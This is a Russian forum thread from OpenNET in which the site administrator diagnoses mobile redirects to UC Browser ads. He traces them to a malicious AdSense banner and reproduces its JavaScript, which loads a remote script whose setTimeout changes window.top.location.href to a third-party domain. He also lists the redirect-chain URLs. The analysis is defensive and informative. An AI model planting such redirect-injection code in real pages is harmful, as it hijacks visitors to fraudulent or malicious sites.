The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

В ntpd выявлена уязвимость, которая может привести к удалённ..., opennews (??), 19-Дек-14, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


24. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +1 +/
Сообщение от Maxim Chirkovemail (ok), 20-Дек-14, 10:42 
> Простите за оффтоп. Но напишу: люблю я почитать ваш сайт, чаще всего
> я делаю это с смартфона. Ну вот, решил я сегодня почитать
> новости, меня перекидывает на рекламу UC Browser, с текстом типа "Для
> просмотра этого сайта установите UC Browser".

На opennet.ru не практикуется размещение всплывающей рекламы и автоматический переброс куда-то. На http://m.opennet.ru вообще никакой рекламы быть не должно.

Наиболее вероятно у вас в смартфоне завелось вредоносное ПО. Попробуйте проверить систему антивирусом. Другое предположение, что вы пользуйтесь беспроводной сетью, подставляющей в трафик свою рекламу. Сообщения об автоматическом открытии рекламных ссылок ко мне периодически поступают, но все они сводились к этим двум причинам.

Напишите, на базе какой ОС у вас смартфон, какой браузер, через какого провайдера выходите в сеть, наблюдается ли подобное для других сайтов, открывайте мобильную или обычную редакцией сайта, на какую страницу перекидывает?


Ответить | Правка | К родителю #7 | Наверх | Cообщить модератору

37. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  –1 +/
Сообщение от Аноним (-), 20-Дек-14, 16:50 
Максим, а у меня другой вопрос. Можно ли перевести опеннет на утф-8? Кажется, время кои8р уже давно прошло.
Ответить | Правка | Наверх | Cообщить модератору

52. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Maxim Chirkovemail (ok), 21-Дек-14, 00:46 
Нереально, слишком много возни с перекодировкой и много чего переделывать придётся.
Ответить | Правка | Наверх | Cообщить модератору

51. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +3 +/
Сообщение от Maxim Chirkovemail (ok), 21-Дек-14, 00:20 
Причина оказалась в Google AdSense. Там кто-то разместил html5-баннер, который показыется только для мобильных браузеров и меняет location.href и перебрасывает на левую страницу. Не ожидал такого недосмотра от Google. До разбирательства отключил код AdSense с сайта.  Жалобу в Google отправил, но когда у них руки дойдут непонятно.


Поймать этот вредоносный баннер можно на http://www.opennet.ru/test/1.html Если почистить Cookie и поставить в User Agent идентификатор Chrome для Android (например,  в Firefox это можно сделать через дополнение User Agent Overrider), то через несколько перезагрузок страницы тот баннер ловится.

Переброс осуществляется на http://www.opennet.ru.tinymp.com/uc.php (на других сайтах вместо "www.opennet.ru" после ".tinymp.com" прописывается текущий домен)

затем на
http://click.union.ucweb.com/index.php?service=RedirectServi...

http://hwoxt.com/?a=510746&c=1281273&m=24&s1=test20


Свойственные для проблемного баннера обращения к AdSense:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-...

http://adx.stcounter.com/adx.js?kcid=51435b3f35749150bf00080...

http://googleads.g.doubleclick.net/pagead/adview?ai=CzVkCEN-...


Проблемный код, который вызывает переход:

try{function callKonvertaZP(src) {if (typeof(src) == 'undefined') return; var d = document, b=d.body; if(src.toUpperCase().indexOf('HTTP://')==0||src.toUpperCase().indexOf('HTTPS://')==0) try{var img = d.createElement('IMG'); var s = src.replace(/%random%/, Math.round(Math.random()*9999999)); with(img.style){position = 'absolute'; width = '0px'; height = '0px';} img.src = s; b.insertBefore(img, b.firstChild);}catch(e){}}
var konverta_ad_href = '';
try{konverta_ad_href=(window.top || window.self).location.href;konverta_ad_href=encodeURIComponent(konverta_ad_href);}catch(e){}
function trackKonvertaClick() {callKonvertaZP('http://adclick.g.doubleclick.net/aclk?sa=l&ai=Coo2lEN-VVPj3C...');}

  (function() {
    var wc = document.createElement('script'); wc.type = 'text/javascript'; wc.async = true;
    wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);
  })();

callKonvertaZP('http://pix.stcounter.com/adx.gif?bid=514b006435749149c200000...');}catch(e){}


В частности, кусок

  wc.src = 'https://pix.stcounter.com/wcjs2.php?r=www.opennet.ru&r2=Mozi...';

приводит к получению строки

setTimeout("window.top.location.href='http://www.opennet.ru.tinymp.com/uc.php?random=1ee46b4c2993b...';", 100);

которая затем выполняется  кодом:

  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wc, s);

Полный архив со слепком проблемных скриптов http://www.opennet.ru/test/1.tgz (проблемный код в 1_files/ads_data/adx.js)

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

64. "В ntpd выявлена уязвимость, которая может привести к удалённ..."  +/
Сообщение от Аноним (-), 21-Дек-14, 05:51 
Вот теперь все нормально, спасибо!
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру